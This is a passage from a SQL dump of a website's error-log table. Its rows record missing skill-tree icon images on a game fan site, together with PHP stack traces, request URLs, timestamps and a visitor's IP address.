'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 133, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (552, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_charm.png\' found.', '32b2536ce0f09c11309acdf069fa33d16795590a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ch...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ch...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_charm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 135, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (553, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_feint.png\' found.', '4db30210ea606147d1ab73adddc7b5710a6d776a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_f...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_f...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:48:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_feint.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 52, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (554, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_stealth.png\' found.', 'a6ad227411e16d3a7dfe7e89acfbfad7961425f7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_stealth...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_stealth...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:48:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_stealth.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 48, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (555, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_fumble.png\' found.', '1f8c059932ebc8a5abcd8509bb855a00556b8628', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_fu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_fu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:48:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_fumble.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 46, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (556, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_curse.png\' found.', '864c06c50d7766f8ef8afcd717ecb68b1cadea28', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_cu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_cu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_curse.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 83, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (557, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_sap.png\' found.', 'a2b545f956fada8da9eca51eb4aab1d3e3daad73', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_sap.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_sap.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:48:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_sap.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 38, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (558, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_17.png\' found.', 'ee990a6d703f9c4f5c55cee19983dee04d62011b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_17.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_17.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:48:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_sword_17.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 36, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (559, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_antishadow.png\' found.', 'd282b1fe83fe88341d8ea3f295a883965c4d170b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_an...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_an...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_antishadow.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 113, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (560, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_summonsuccubus.png\' found.', '9bde8bddbb54984f14da706ea41dc0d7747bbcad', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_su...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_su...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_summonsuccubus.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 115, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (561, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_lifedrain.png\' found.', 'aa40e55e600b28532a843cf2fab5411575a52888', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_li...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_li...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_lifedrain.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 118, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (562, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_weapon_crossbow_11.png\' found.', 'bbefbe01e1a7e7bfc8313889fdcb590caf971fa5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_cros...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_cros...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_weapon_crossbow_11.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 26, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (563, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_possession.png\' found.', 'b4251740a6b0436ccb01e0d8cecb97717aa03241', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_po...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_po...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_possession.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 24, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (564, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_wand_01.png\' found.', '7cbfdbeaba2e3bf3c66b922b0d598e3e13da1833', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_wand_01.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_wand_01.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_wand_01.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 230, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (565, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_manaregentotem.png\' found.', 'd0d18161e345b1910d327fa7c600ddf20b39072d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_manaregentotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 147, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (566, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_wordfortitude.png\' found.', 'f4e6cd4348bfbec5f2e1513b5ae0b0c4d2ed62e9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_word...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_word...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_wordfortitude.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 126, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (567, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_powerwordshield.png\' found.', '60308c57da7a2e5f0f44ab4a98ed274a6f3d63c4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_powe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_powe...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_powerwordshield.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 124, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (568, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hibernation.png\' found.', '5d9096581b5df8e7c647347dd6306fea943e6a1b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hiberna...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hiberna...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hibernation.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 113, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (569, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_manaburn.png\' found.', '7741929ec103a912779d77b622c3c2bb848376a0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_manaburn.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 326, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (570, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_divinespirit.png\' found.', '98d22c0f5e20abd63502f662b110846b01c0b5b8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_divi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_divi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_divinespirit.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 107, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (571, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_slowingtotem.png\' found.', '83af0ed9ed01494642456be0d08ae1bc200d29e9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_sl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_sl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_slowingtotem.png', 